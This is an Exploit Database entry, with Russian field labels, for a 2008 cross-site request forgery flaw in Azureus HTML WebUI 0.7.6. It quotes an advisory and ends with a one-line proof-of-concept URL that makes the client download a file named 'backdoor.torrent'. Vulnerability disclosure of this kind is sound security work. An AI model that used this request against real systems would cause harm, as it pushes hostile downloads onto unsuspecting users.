Exploit Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery

[Exploiter]

EDB-ID

31673

Проверка EDB

1. Пройдено

Автор

TH3.R00K

Тип уязвимости

WEBAPPS

Платформа

MULTIPLE

CVE

N/A

Дата публикации

2008-04-18

source: https://www.securityfocus.com/bid/28848/info

Azureus HTML WebUI is prone to a cross-site request-forgery vulnerability.

Successful exploits aid in transferring malicious content to unsuspecting users' computers, aiding in further attacks. Other actions may also be affected, but this has not been confirmed.

Azureus HTML WebUI 0.7.6 is vulnerable; other versions may also be affected. 

http://www.example.com:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent